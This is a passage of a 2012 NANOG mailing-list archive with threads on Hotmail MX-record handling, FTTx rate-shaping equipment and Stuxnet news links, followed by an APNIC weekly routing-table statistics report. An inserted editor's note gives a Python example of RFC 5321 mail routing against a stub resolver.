>>> At the time of the transaction, nothing special was happening here,
>> ...
>>
>> Was anything strange happening with any of the DNS records for any of
>> these domains in the past two days?
>>
>> Aloha,
>> Michael.
>> --
>> "Please have your Internet License
>> and Usenet Registration handy..."
> --
> Mark Andrews, ISC
> 1 Seymour St., Dundas Valley, NSW 2117, Australia
> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

Aloha,
Michael.
--
"Please have your Internet License
and Usenet Registration handy..."


From marka at isc.org Thu Jul 26 21:45:37 2012
From: marka at isc.org (Mark Andrews)
Date: Fri, 27 Jul 2012 12:45:37 +1000
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: Your message of "Thu, 26 Jul 2012 19:28:47 MST."
References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org>
Message-ID: <20120727024538.46BAF23125D1@drugs.dv.isc.org>

In message , Michael J Wise writes:
>
> On Jul 26, 2012, at 6:34 PM, Mark Andrews wrote:
>
> > In message , Michael J Wise writes:
> >>
> >> On Jul 26, 2012, at 1:35 AM, Lou Katz wrote:
> >>
> >>> The domain is cookephoto.com
> >>
> >> Why does mail.metron.com have MX records?
> >
> > Why do you care? There is nothing wrong with having explicit MX
> > records and they generally take up less room in a DNS cache than
> > the negative response does especially if it is DNSSEC signed.
> >
> >> And they're different.
> >
> > Again why do you care?
>
> Why do *I* care?
> I don't.
>
> I'm just trying to find the weird bit that maybe is causing hotmail to
> stumble.
> And maybe an endless loop for an MX lookup might be what is causing
> hotmail to panic and throw out the MX records.

You don't lookup MX records for MX targets. This is basic MTA
processing.

If the MX lookup fails, as opposed to returns nodata, you don't
lookup the A/AAAA records and synthesize an MX record. You treat it
as a soft error and queue for retry later. Again this is basic MTA
processing.

You don't depend on ALL (ANY) returning MX records as they may not
be in the cache. You need to make an explicit MX query if no MX
records are returned in response to an ALL query.

Mark
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org


From erikm at buh.org Thu Jul 26 22:21:21 2012
From: erikm at buh.org (Erik Muller)
Date: Thu, 26 Jul 2012 20:21:21 -0700
Subject: Rate shaping in Active E FTTx networks
In-Reply-To:
References:
Message-ID: <50120931.4050408@buh.org>

On 7/26/12 12:45 , Jason Lixfeld wrote:
> Hi all,
>
> I'm trying to gauge what operators are doing to handle per-subscriber
> Internet access PIR bandwidth in Active E FTTx networks.
>
> I presume operators would want to limit each subscriber to a
> certain PIR, but within that limit, do things like perform preferential
> treatment of interactive services like streaming video or Skype, etc.,
> ahead of non-interactive services like FTP.
>
> My impression is that a subscriber's physical access in these networks
> is exponentially larger than their allocated amount of Internet access.
> This would leave ample room on the physical access for other
> services like Voice and IPTV that might run on separate VLANs than the
> Internet access VLAN. That said, I doubt there's really that much of a
> concern about allocating PIR on these other service VLANs.
>
> So in terms of PIR for Internet access, is there some magic box that
> sits between the various subscriber aggregation points and the core,
> which takes care of shaping the subscriber's Internet access PIR, while
> making sure that any preferential treatment of interactive services
> is performed.
>
> Is that a lot to ask for one box? The ridiculously deep buffers
> required in order to shape to PIR vs. police to it (because policing to
> a PIR is just plain ugly) and the requirements to perform any sort of
> preferential packet treatment above and beyond that seem like quite a
> lot to ask of one box. Am I wrong?
>
> Who might make a box like this, if it exists? And if not, what are
> folks using to achieve these results?
>
> Thanks in advance for any insights..

I've seen a few deployments using Packeteer's (now BlueCoat) PacketShaper for this purpose; the only downside I've heard with that platform is cost. Sandvine and Fortinet are a couple other options that have different approaches, but have a lot of this functionality rolled in alongside their broader security services.
-e


From MGauvin at dryden.ca Thu Jul 26 22:48:00 2012
From: MGauvin at dryden.ca (Mark Gauvin)
Date: Thu, 26 Jul 2012 22:48:00 -0500
Subject: Rate shaping in Active E FTTx networks
In-Reply-To: <50120931.4050408@buh.org>
References: , <50120931.4050408@buh.org>
Message-ID: <4DEA063ACE629740877D59B74D6FB264240873EBBA@exchange.citydryden.local>

Juniper dynamic application awareness does a decent job and so does the cisco counterpart saves buying more hw

________________________________________
From: Erik Muller [erikm at buh.org]
Sent: Thursday, July 26, 2012 10:21 PM
To: nanog at nanog.org
Subject: Re: Rate shaping in Active E FTTx networks

On 7/26/12 12:45 , Jason Lixfeld wrote:
> Hi all,
>
> I'm trying to gauge what operators are doing to handle per-subscriber
> Internet access PIR bandwidth in Active E FTTx networks.
>
> I presume operators would want to limit each subscriber to a
> certain PIR, but within that limit, do things like perform preferential
> treatment of interactive services like streaming video or Skype, etc.,
> ahead of non-interactive services like FTP.
>
> My impression is that a subscriber's physical access in these networks
> is exponentially larger than their allocated amount of Internet access.
> This would leave ample room on the physical access for other
> services like Voice and IPTV that might run on separate VLANs than the
> Internet access VLAN. That said, I doubt there's really that much of a
> concern about allocating PIR on these other service VLANs.
>
> So in terms of PIR for Internet access, is there some magic box that
> sits between the various subscriber aggregation points and the core,
> which takes care of shaping the subscriber's Internet access PIR, while
> making sure that any preferential treatment of interactive services
> is performed.
>
> Is that a lot to ask for one box? The ridiculously deep buffers
> required in order to shape to PIR vs. police to it (because policing to
> a PIR is just plain ugly) and the requirements to perform any sort of
> preferential packet treatment above and beyond that seem like quite a
> lot to ask of one box. Am I wrong?
>
> Who might make a box like this, if it exists? And if not, what are
> folks using to achieve these results?
>
> Thanks in advance for any insights..

I've seen a few deployments using Packeteer's (now BlueCoat) PacketShaper for this purpose; the only downside I've heard with that platform is cost. Sandvine and Fortinet are a couple other options that have different approaches, but have a lot of this functionality rolled in alongside their broader security services.

-e


From rgolodner at infratection.com Thu Jul 26 23:08:12 2012
From: rgolodner at infratection.com (Richard Golodner)
Date: Thu, 26 Jul 2012 23:08:12 -0500
Subject: Stuxnet and more
Message-ID: <000601cd6bad$7130cbf0$539263d0$@infratection.com>

Grant said today:

-----Original Message-----
From: Grant Ridder [mailto:shortdudey123 at gmail.com]
Sent: Thursday, July 26, 2012 11:25 AM
To: nanog at nanog.org
Subject: Stuxnet

Hi Everyone,

I realize most people already know the history of Stuxnet but I figured I would pass along an IEEE article that was just published.

http://spectrum.ieee.org/computing/networks/declarations-of-cyberwar

-Grant

Grant and the rest of you NANOGERS, more regarding new problems in Iran via an F-Secure blog. Here is the link:
http://www.f-secure.com/weblog/archives/00002403.html

Sincerely, Richard Golodner
P.S. Did I ever mention how much I hate M$ Windows?


From scott at doc.net.au Fri Jul 27 02:04:40 2012
From: scott at doc.net.au (Scott Howard)
Date: Fri, 27 Jul 2012 00:04:40 -0700
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <20120727024538.46BAF23125D1@drugs.dv.isc.org>
References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org>
Message-ID:

On Thu, Jul 26, 2012 at 7:45 PM, Mark Andrews wrote:

> You don't lookup MX records for MX targets. This is basic MTA
> processing.
>
> If the MX lookup fails, as opposed to returns nodata, you don't
> lookup the A/AAAA records and synthesize an MX record. You treat it
> as a soft error and queue for retry later. Again this is basic MTA
> processing.
>

And yet, Hotmail apparently is doing the exact opposite of that. Which means what 'should' happen or what 'should' be done isn't as relevant as we would all like it to be.

Given this, considering "unusual" things like the target of an MX record having an MX record it - whilst completely irrelevant for a well-behaved mail server - might actually be relevant here...

Scott.


From jeff-kell at utc.edu Fri Jul 27 07:01:45 2012
From: jeff-kell at utc.edu (Jeff Kell)
Date: Fri, 27 Jul 2012 08:01:45 -0400
Subject: Rate shaping in Active E FTTx networks
In-Reply-To: <50120931.4050408@buh.org>
References: <50120931.4050408@buh.org>
Message-ID: <50128329.9080501@utc.edu>

On 7/26/2012 11:21 PM, Erik Muller wrote:
> I've seen a few deployments using Packeteer's (now BlueCoat)
> PacketShaper for this purpose; the only downside I've heard with that
> platform is cost. Sandvine and Fortinet are a couple other options
> that have different approaches, but have a lot of this functionality
> rolled in alongside their broader security services.

For shaping flexibility and real DPI, Procera PacketLogic is an order of magnitude (and throughput) beyond Packeteer (speaking as a current user of the former and a former user of the latter). I know their higher-ed distribution is substantial (for those that shape by policy).
There are other "fair game" shaping appliances (NetEqualizer) if you just want to give everyone equal access to whatever bandwidth remains. But for real application inspection, the traditional players (Packeteer, Allot, etc) today just tell you that yes, 80-90% of your traffic is HTTP protocol, now what?

Jeff


From jared at puck.nether.net Fri Jul 27 07:16:10 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Fri, 27 Jul 2012 08:16:10 -0400
Subject: Rate shaping in Active E FTTx networks
In-Reply-To:
References:
Message-ID: <6801FA53-6DF9-4BDA-B958-9AEEA12E74EA@puck.nether.net>

Many CPE platforms have the rate limit built in. Some (eg: Zhone) do this in 1mbps increments. Ideally there would be some greater level of granularity but it seems to work.

You can obviously police on the other end as well if required.

Jared Mauch

On Jul 26, 2012, at 3:45 PM, Jason Lixfeld wrote:

> So in terms of PIR for Internet access, is there some magic box that sits between the various subscriber aggregation points and the core, which takes care of shaping the subscriber's Internet access PIR, while making sure that any preferential treatment of interactive services is performed.


From bedard.phil at gmail.com Fri Jul 27 07:49:05 2012
From: bedard.phil at gmail.com (Phil)
Date: Fri, 27 Jul 2012 08:49:05 -0400
Subject: Rate shaping in Active E FTTx networks
In-Reply-To:
References:
Message-ID:

On the downstream end the limiting is usually done on the subscriber aggregation equipment. Router vendors sell linecards with large amounts of queue capability for this reason. This is where you would introduce some kind of QoS to deal with video or voice as well. Upstream could be done the same way if they have true direct connections to the gear or be done on a CPE.

As far as differentiating traffic within an Internet pipe that is a slippery legal slope.

Others have mentioned the bigger players like Procera and Sandvine.

Phil

On Jul 26, 2012, at 3:45 PM, Jason Lixfeld wrote:

> Hi all,
>
> I'm trying to gauge what operators are doing to handle per-subscriber Internet access PIR bandwidth in Active E FTTx networks.
>
> I presume operators would want to limit each subscriber to a certain PIR, but within that limit, do things like perform preferential treatment of interactive services like streaming video or Skype, etc., ahead of non-interactive services like FTP.
>
> My impression is that a subscriber's physical access in these networks is exponentially larger than their allocated amount of Internet access. This would leave ample room on the physical access for other services like Voice and IPTV that might run on separate VLANs than the Internet access VLAN. That said, I doubt there's really that much of a concern about allocating PIR on these other service VLANs.
>
> So in terms of PIR for Internet access, is there some magic box that sits between the various subscriber aggregation points and the core, which takes care of shaping the subscriber's Internet access PIR, while making sure that any preferential treatment of interactive services is performed.
>
> Is that a lot to ask for one box? The ridiculously deep buffers required in order to shape to PIR vs. police to it (because policing to a PIR is just plain ugly) and the requirements to perform any sort of preferential packet treatment above and beyond that seem like quite a lot to ask of one box. Am I wrong?
>
> Who might make a box like this, if it exists? And if not, what are folks using to achieve these results?
>
> Thanks in advance for any insights..
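Editor's note: the MX-handling rules Mark Andrews lays out in the "Is Hotmail in the habit of ignoring MX records?" thread above (no MX lookup for MX targets; a failed MX lookup is a soft error to retry, not a cue to synthesize an MX from A/AAAA; only a real "no data" answer yields the implicit MX) are what RFC 5321 section 5.1 requires of an SMTP client. The following is an added example, not code from any of the posters or from any MTA, that implements that decision. The cookephoto.com / mail.metron.com / mail2.metron.com / mail.katz.com records are the ones Michael Wise posted; the resolver is a constructed stub, and the names nomx.example, broken.example and nx.example are constructed to exercise the no-MX, lookup-failure and nonexistent-domain cases.

```python
"""SMTP client mail-routing decision per RFC 5321 section 5.1.

Added example with a constructed stub resolver; the metron.com/katz.com
records are the ones posted in the thread, the *.example names are made up.
"""
from typing import Dict, List, Tuple

# Outcomes the stub resolver can report for a query.
ANSWER, NODATA, NXDOMAIN, SERVFAIL = "answer", "nodata", "nxdomain", "servfail"


class StubResolver:
    """Minimal stand-in for a DNS resolver that records every query it sees."""

    def __init__(self, zone: Dict[Tuple[str, str], list], failing: set):
        self.zone = zone          # (name, rrtype) -> list of rdata
        self.failing = failing    # names whose lookups fail (SERVFAIL / timeout)
        self.log: List[Tuple[str, str]] = []

    def query(self, name: str, rrtype: str):
        self.log.append((name, rrtype))
        if name in self.failing:
            return SERVFAIL, []
        if (name, rrtype) in self.zone:
            return ANSWER, list(self.zone[(name, rrtype)])
        if any(n == name for n, _ in self.zone):
            return NODATA, []     # name exists but has no records of this type
        return NXDOMAIN, []


def build_resolver() -> StubResolver:
    zone = {
        # Records as posted in the thread.
        ("cookephoto.com", "A"): ["192.160.193.89"],
        ("cookephoto.com", "MX"): [(10, "mail.metron.com"), (12, "mail2.metron.com"),
                                   (15, "mail.katz.com")],
        ("mail.metron.com", "A"): ["192.160.193.14"],
        ("mail.metron.com", "MX"): [(10, "mail.metron.com"), (20, "mail.katz.com")],
        ("mail.katz.com", "A"): ["192.160.193.14"],
        ("mail2.metron.com", "A"): ["209.204.189.91"],
        # Constructed: a domain with an address record and no MX at all.
        ("nomx.example", "A"): ["192.0.2.25"],
    }
    # Constructed: a domain whose lookups fail outright.
    return StubResolver(zone, failing={"broken.example"})


def mail_targets(domain: str, resolver: StubResolver):
    """Decide where mail for `domain` goes.

    Returns ("deliver", [(preference, host, [addresses]), ...]) in preference
    order, ("tempfail", reason) when delivery must be queued and retried, or
    ("permfail", reason) when the mail should bounce.
    """
    status, mx = resolver.query(domain, "MX")
    if status == SERVFAIL:
        # A failed lookup is not "no MX records": defer, never fall back to A/AAAA.
        return "tempfail", f"MX lookup for {domain} failed; queued for retry"
    if status == NXDOMAIN:
        return "permfail", f"{domain} does not exist"
    if status == NODATA:
        # Genuine no-data answer: the implicit MX is the domain itself, preference 0.
        mx = [(0, domain)]

    targets, deferred = [], False
    for pref, host in sorted(mx):
        # MX targets are resolved to addresses only; their own MX records are never consulted.
        addrs = []
        for rrtype in ("A", "AAAA"):
            st, rdata = resolver.query(host, rrtype)
            if st == SERVFAIL:
                deferred = True
                break
            addrs.extend(rdata)
        else:
            if addrs:
                targets.append((pref, host, addrs))
    if targets:
        return "deliver", targets
    if deferred:
        return "tempfail", "address lookup for an MX target failed; queued for retry"
    return "permfail", f"no MX target for {domain} has an address record"


if __name__ == "__main__":
    for name in ("cookephoto.com", "nomx.example", "broken.example", "nx.example"):
        r = build_resolver()
        print(name, "->", mail_targets(name, r))
        # Shows that no MX query was ever made for an MX target such as mail.metron.com.
        print("  queries:", r.log)
```

The resolver log is the check worth keeping: a client that behaves as Mark describes never issues an MX query for mail.metron.com even though that host has MX records, so the "MX of an MX target" that looked odd in the thread cannot cause a loop. Mark's last point, that an ANY/ALL answer assembled from cache proves nothing about MX records, is why the first query here is an explicit MX lookup rather than anything derived from a cached response.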
From mail at danrl.de Fri Jul 27 09:02:25 2012
From: mail at danrl.de (Dan Luedtke)
Date: Fri, 27 Jul 2012 16:02:25 +0200
Subject: Stuxnet and more
In-Reply-To: <000601cd6bad$7130cbf0$539263d0$@infratection.com>
References: <000601cd6bad$7130cbf0$539263d0$@infratection.com>
Message-ID: <1343397745.29320.16.camel@localhost>

http://www.f-secure.com/weblog/archives/00002403.html
> There was also some music playing randomly on several of the
> workstations during the middle of the night with the volume maxed
> out. I believe it was playing 'Thunderstruck' by AC/DC.

Someone "orchestrated an attack", hmm? Nice.

--
Dan Luedtke
http://www.danrl.de


From mpetach at netflight.com Fri Jul 27 11:14:46 2012
From: mpetach at netflight.com (Matthew Petach)
Date: Fri, 27 Jul 2012 09:14:46 -0700
Subject: [routing-wg] The Cidr Report
In-Reply-To:
References: <201110142200.p9EM00ua002638@wattle.apnic.net>
Message-ID:

On Sat, Oct 15, 2011 at 12:25 PM, Geoff Huston wrote:
> Perhaps we should have newnog implement a penalty payment system for registrations; tag an extra $25 "excessive leakage" charge onto conference registrations for networks that are in the top 30 list?

I worked at a network that made it onto the list of shame. Once. It was projected onto the screen at NANOG 8 during a presentation. I don't even remember the rest of the presentation, because all of us present from that network immediately ssh'd in, figured out the missing route-map on a session, applied it, and looked around very red-facedly at everyone else in the room.

anonymous shaming on a mailing list is one thing. public shaming in a room full of your peers...that hits home immediately and viscerally, if you have any pride as an engineer. ^_^;;

Don't stop what you're doing, Geoff--it does make a difference.
Matt


From surfer at mauigateway.com Fri Jul 27 13:12:26 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Fri, 27 Jul 2012 11:12:26 -0700
Subject: Stuxnet and more
Message-ID: <20120727111226.BA86C8E7@resin09.mta.everyone.net>

--- rgolodner at infratection.com wrote:
From: "Richard Golodner"

Grant and the rest of you NANOGERS, more regarding new problems in Iran via an F-Secure blog. Here is the link:
http://www.f-secure.com/weblog/archives/00002403.html
------------------------------------------------

If you connect those kind of networks to machines connected to the internet you gets what you pays for...

scott


From cscora at apnic.net Fri Jul 27 14:10:37 2012
From: cscora at apnic.net (Routing Analysis Role Account)
Date: Sat, 28 Jul 2012 05:10:37 +1000 (EST)
Subject: Weekly Routing Table Report
Message-ID: <201207271910.q6RJAg8w017939@thyme.rand.apnic.net>

This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan.

The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group.

Daily listings are sent to bgp-stats at lists.apnic.net

For historical data, please see http://thyme.rand.apnic.net.

If you have any comments please contact Philip Smith .
Routing Table Report 04:00 +10GMT Sat 28 Jul, 2012

Report Website: http://thyme.rand.apnic.net
Detailed Analysis: http://thyme.rand.apnic.net/current/

Analysis Summary
----------------

BGP routing table entries examined: 419174
Prefixes after maximum aggregation: 176627
Deaggregation factor: 2.37
Unique aggregates announced to Internet: 204455
Total ASes present in the Internet Routing Table: 41639
Prefixes per ASN: 10.07
Origin-only ASes present in the Internet Routing Table: 33374
Origin ASes announcing only one prefix: 15702
Transit ASes present in the Internet Routing Table: 5601
Transit-only ASes present in the Internet Routing Table: 136
Average AS path length visible in the Internet Routing Table: 4.6
Max AS path length visible: 32
Max AS path prepend of ASN ( 48687) 24
Prefixes from unregistered ASNs in the Routing Table: 382
Unregistered ASNs in the Routing Table: 146
Number of 32-bit ASNs allocated by the RIRs: 3041
Number of 32-bit ASNs visible in the Routing Table: 2664
Prefixes from 32-bit ASNs in the Routing Table: 6906
Special use prefixes present in the Routing Table: 1
Prefixes being announced from unallocated address space: 170
Number of addresses announced to Internet: 2582312876
Equivalent to 153 /8s, 234 /16s and 247 /24s
Percentage of available address space announced: 69.7
Percentage of allocated address space announced: 69.7
Percentage of available address space allocated: 99.9
Percentage of address space in use by end-sites: 93.1
Total number of prefixes smaller than registry allocations: 146088

APNIC Region Analysis Summary
-----------------------------

Prefixes being announced by APNIC Region ASes: 102575
Total APNIC prefixes after maximum aggregation: 32799
APNIC Deaggregation factor: 3.13
Prefixes being announced from the APNIC address blocks: 103070
Unique aggregates announced from the APNIC address blocks: 42296
APNIC Region origin ASes present in the Internet Routing Table: 4721
APNIC Prefixes per ASN: 21.83
APNIC Region origin ASes announcing only one prefix: 1238
APNIC Region transit ASes present in the Internet Routing Table: 754
Average APNIC Region AS path length visible: 4.6
Max APNIC Region AS path length visible: 26
Number of APNIC region 32-bit ASNs visible in the Routing Table: 259
Number of APNIC addresses announced to Internet: 705852800
Equivalent to 42 /8s, 18 /16s and 117 /24s
Percentage of available APNIC address space announced: 82.5

APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431
(pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319,
58368-59391, 131072-133119
APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8,

ARIN Region Analysis Summary
----------------------------

Prefixes being announced by ARIN Region ASes: 153020
Total ARIN prefixes after maximum aggregation: 77710
ARIN Deaggregation factor: 1.97
Prefixes being announced from the ARIN address blocks: 154089
Unique aggregates announced from the ARIN address blocks: 68810
ARIN Region origin ASes present in the Internet Routing Table: 15208
ARIN Prefixes per ASN: 10.13
ARIN Region origin ASes announcing only one prefix: 5776
ARIN Region transit ASes present in the Internet Routing Table: 1608
Average ARIN Region AS path length visible: 4.1
Max ARIN Region AS path length visible: 24
Number of ARIN region 32-bit ASNs visible in the Routing Table: 16
Number of ARIN addresses announced to Internet: 1083040640
Equivalent to 64 /8s, 141 /16s and 227 /24s
Percentage of available ARIN address space announced: 57.3

ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106
(pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153
3354-4607, 4865-5119, 5632-6655, 6912-7466
7723-8191, 10240-12287, 13312-15359, 16384-17407
18432-20479, 21504-23551, 25600-26591,
26624-27647, 29696-30719, 31744-33791
35840-36863, 39936-40959, 46080-47103
53248-55295, 393216-394239
ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8,

RIPE Region Analysis Summary
----------------------------

Prefixes being announced by RIPE Region ASes: 104106
Total RIPE prefixes after maximum aggregation: 55508
RIPE Deaggregation factor: 1.88
Prefixes being announced from the RIPE address blocks: 106284
Unique aggregates announced from the RIPE address blocks: 67918
RIPE Region origin ASes present in the Internet Routing Table: 16711
RIPE Prefixes per ASN: 6.36
RIPE Region origin ASes announcing only one prefix: 8098
RIPE Region transit ASes present in the Internet Routing Table: 2716
Average RIPE Region AS path length visible: 5.1
Max RIPE Region AS path length visible: 32
Number of RIPE region 32-bit ASNs visible in the Routing Table: 1746
Number of RIPE addresses announced to Internet: 637676548
Equivalent to 38 /8s, 2 /16s and 44 /24s
Percentage of available RIPE address space announced: 92.7

RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614
(pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631
6656-6911, 8192-9215, 12288-13311, 15360-16383
20480-21503, 24576-25599, 28672-29695
30720-31743, 33792-35839, 38912-39935
40960-45055, 47104-52223, 56320-58367
59392-61439, 196608-199679
RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8,

LACNIC Region Analysis Summary
------------------------------

Prefixes being announced by LACNIC Region ASes: 42912
Total LACNIC prefixes after maximum aggregation: 8381
LACNIC Deaggregation factor: 5.12
Prefixes being announced from the LACNIC address blocks: 45634
Unique aggregates announced from the LACNIC address blocks: 21883
LACNIC Region origin ASes present in the Internet Routing Table: 1616
LACNIC Prefixes per ASN: 28.24
LACNIC Region origin ASes announcing only one prefix: 424
LACNIC Region transit ASes present in the Internet Routing Table: 313
Average LACNIC Region AS path length visible: 4.8
Max LACNIC Region AS path length visible: 25
Number of LACNIC region 32-bit ASNs visible in the Routing Table: 637
Number of LACNIC addresses announced to Internet: 113013416
Equivalent to 6 /8s, 188 /16s and 114 /24s
Percentage of available LACNIC address space announced: 67.4

LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 262144-263167 plus ERX transfers
LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8,

AfriNIC Region Analysis Summary
-------------------------------

Prefixes being announced by AfriNIC Region ASes: 9495
Total AfriNIC prefixes after maximum aggregation: 2175
AfriNIC Deaggregation factor: 4.37
Prefixes being announced from the AfriNIC address blocks: 9927
Unique aggregates announced from the AfriNIC address blocks: 3399
AfriNIC Region origin ASes present in the Internet Routing Table: 550
AfriNIC Prefixes per ASN: 18.05
AfriNIC Region origin ASes announcing only one prefix: 166
AfriNIC Region transit ASes present in the Internet Routing Table: 120
Average AfriNIC Region AS path length visible: 4.4
Max AfriNIC Region AS path length visible: 25
Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 6
Number of AfriNIC addresses announced to Internet: 41353984
Equivalent to 2 /8s, 119 /16s and 3 /24s
Percentage of available AfriNIC address space announced: 41.1

AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers
AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8,

APNIC Region per AS prefix count summary
----------------------------------------

ASN No of nets /20 equiv MaxAgg Description
4766 2759 11123 1252 Korea Telecom (KIX)
17974 2274 569 90 PT TELEKOMUNIKASI INDONESIA
7545 1703 301 86 TPG Internet Pty Ltd
4755 1614 388 163 TATA Communications formerly
9829 1306 1085 26 BSNL National Internet Backbo
9583 1160 87 508 Sify Limited
7552 1128 1062 11 Vietel Corporation
4808 1117 2052 317 CNCGROUP IP network: China169
24560 1038 385 165 Bharti Airtel Ltd., Telemedia
9498 991 294 73 BHARTI Airtel Ltd.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC

ARIN Region per AS prefix count summary
---------------------------------------

ASN No of nets /20 equiv MaxAgg Description
7029 3412 986 155 Windstream Communications Inc
6389 3383 3773 186 bellsouth.net, inc.
18566 2088 382 181 Covad Communications
1785 1939 681 130 PaeTec Communications, Inc.
22773 1698 2914 125 Cox Communications, Inc.
20115 1647 1570 611 Charter Communications
4323 1575 1028 383 Time Warner Telecom
30036 1404 274 788 Mediacom Communications Corp
7018 1255 10040 822 AT&T WorldNet Services
11492 1192 217 350 Cable One

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN

RIPE Region per AS prefix count summary
---------------------------------------

ASN No of nets /20 equiv MaxAgg Description
8402 1595 544 16 Corbina telecom
12479 808 749 92 Uni2 Autonomous System
34984 735 189 177 BILISIM TELEKOM
6830 715 2310 446 UPC Distribution Services
20940 707 228 554 Akamai Technologies European
31148 706 37 9 FreeNet ISP
2118 632 97 14 EUnet/RELCOM Autonomous Syste
13188 613 100 9 Educational Network
8551 579 364 61 Bezeq International
3320 502 8443 411 Deutsche Telekom AG

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE

LACNIC Region per AS prefix count summary
-----------------------------------------

ASN No of nets /20 equiv MaxAgg Description
28573 2044 1226 58 NET Servicos de Comunicao S.A
10620 2030 349 213 TVCABLE BOGOTA
6503 1527 419 67 AVANTEL, S.A.
8151 1470 3069 350 UniNet S.A. de C.V.
7303 1458 934 196 Telecom Argentina Stet-France
6458 882 81 15 GUATEL
27947 719 74 95 Telconet S.A
11172 644 91 75 Servicios Alestra S.A de C.V
3816 597 250 84 Empresa Nacional de Telecomun
22047 583 326 15 VTR PUNTO NET S.A.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC

AfriNIC Region per AS prefix count summary
------------------------------------------

ASN No of nets /20 equiv MaxAgg Description
8452 1030 958 13 TEDATA
24863 859 274 32 LINKdotNET AS number
6713 509 650 19 Itissalat Al-MAGHRIB
36998 483 48 3 MOBITEL
24835 286 80 8 RAYA Telecom - Egypt
3741 262 905 223 The Internet Solution
12258 197 28 62 Vodacom Internet Company
29975 191 667 21 Vodacom
16637 170 680 87 MTN Network Solutions
15706 160 32 6 Sudatel Internet Exchange Aut

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC

Global Per AS prefix count summary
----------------------------------

ASN No of nets /20 equiv MaxAgg Description
7029 3412 986 155 Windstream Communications Inc
6389 3383 3773 186 bellsouth.net, inc.
4766 2759 11123 1252 Korea Telecom (KIX)
17974 2274 569 90 PT TELEKOMUNIKASI INDONESIA
18566 2088 382 181 Covad Communications
28573 2044 1226 58 NET Servicos de Comunicao S.A
10620 2030 349 213 TVCABLE BOGOTA
1785 1939 681 130 PaeTec Communications, Inc.
7545 1703 301 86 TPG Internet Pty Ltd
22773 1698 2914 125 Cox Communications, Inc.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet

Global Per AS Maximum Aggr summary
----------------------------------

ASN No of nets Net Savings Description
6389 3383 3197 bellsouth.net, inc.
17974 2274 2184 PT TELEKOMUNIKASI INDONESIA
28573 2044 1986 NET Servicos de Comunicao S.A
18566 2088 1907 Covad Communications
10620 2030 1817 TVCABLE BOGOTA
1785 1939 1809 PaeTec Communications, Inc.
7545 1703 1617 TPG Internet Pty Ltd
8402 1595 1579 Corbina telecom
22773 1698 1573 Cox Communications, Inc.
